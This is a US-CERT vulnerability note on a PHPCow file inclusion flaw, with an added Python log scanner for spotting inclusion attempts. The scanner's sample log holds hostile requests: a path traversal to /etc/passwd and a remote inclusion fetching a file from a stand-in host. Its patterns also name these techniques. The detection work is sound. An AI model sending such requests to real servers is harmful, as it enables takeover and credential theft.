Vulnerability Note VU#515417

PHPCow file inclusion vulnerability

Overview

Older versions of PHPCow contain a file inclusion vulnerability that could allow an attacker to take control of a vulnerable application.

I. Description

PHPCow is a content management system that uses PHP. Older versions of PHPCow contain a file inclusion vulnerability. We are aware of reports that this issue is being actively exploited.

II. Impact

A remote attacker may be able to take control of a vulnerable PHPCow application.

III. Solution

Upgrade

It is not clear which versions of PHPCow are vulnerable. The PHPCow support team has reported that recent versions of PHPCow addressed this issue. Contact PHPCow for more information about obtaining updated software.

Workarounds for administrators

  • Administrators are encouraged to periodically check their web server log files for indications (such as malformed URLs) that their web applications have been compromised.
  • Web application firewalls and reverse proxy servers may be able to block some known attacks.
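
The log review recommended above can be partly automated. The following Python script is an added example, not part of the original note and not PHPCow or US-CERT code: it reads access log lines in combined log format and flags query parameters whose decoded value looks like a file inclusion attempt. The parameter names, addresses and log lines are constructed for illustration, and the indicator list is an assumption that goes beyond the note's "malformed URLs" wording.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache/nginx combined log format: client, request method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Patterns checked against each fully decoded query-parameter value.
INDICATORS = {
    "remote-url": re.compile(r"^(?:https?|ftp)://", re.I),
    "stream-wrapper": re.compile(r"^(?:php|data|expect|phar|zip|file):", re.I),
    "traversal": re.compile(r"(?:^|[\\/])\.\.[\\/]"),
    "null-byte": re.compile(r"\x00"),
}

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e), bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (client, status, parameter, indicator) tuples for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not in the expected format; skipped rather than guessed at
    host, _method, target, status = m.groups()
    query = target.partition("?")[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)
        hits += [(host, status, name, label)
                 for label, rx in INDICATORS.items() if rx.search(value)]
    return hits

def scan_log(lines):
    return [hit for line in lines for hit in scan_line(line)]

# Constructed sample lines; parameter names and addresses are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Nov/2008:10:01:02 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120
198.51.100.7 - - [19/Nov/2008:10:02:11 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%2500 HTTP/1.1" 200 1843
198.51.100.7 - - [19/Nov/2008:10:02:15 +0000] "GET /index.php?page=http://203.0.113.9/x.txt? HTTP/1.1" 200 312
192.0.2.44 - - [19/Nov/2008:10:03:40 +0000] "GET /search.php?q=http+headers&ref=/about HTTP/1.1" 200 900
""".splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

A 200 status on a flagged request shows only that the request was served, not that the inclusion succeeded; treat each hit as a lead for manual review of the application and its files.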

Workarounds for users
  • Following the recommendations in the Securing Your Web Browser document will mitigate many attacks that an attacker may launch after taking over a web application.

Systems Affected

Vendor | Status | Date Notified | Date Updated
PHPCow, LLC | Vulnerable | 2008-11-19

References


https://support.phpcow.com/index.php?_m=knowledgebase&_a=printable&kbarticleid=14
http://www.us-cert.gov/reading_room/securing_browser/
http://www.owasp.org/index.php/PHP_Top_5
http://www.g-brain.net/tutorials/local-file-inclusions.txt

Credit

This document was written by Ryan Giobbi.

Other Information

Date Public: 2008-11-19
Date First Published: 2008-11-19
Date Last Updated: 2008-11-19
CERT Advisory:
CVE-ID(s):
NVD-ID(s):
US-CERT Technical Alerts:
Metric: 1.35
Document Revision: 26

If you have feedback, comments, or additional information about this vulnerability, please send us email.
 

 
Produced 2008 by US-CERT, a government organization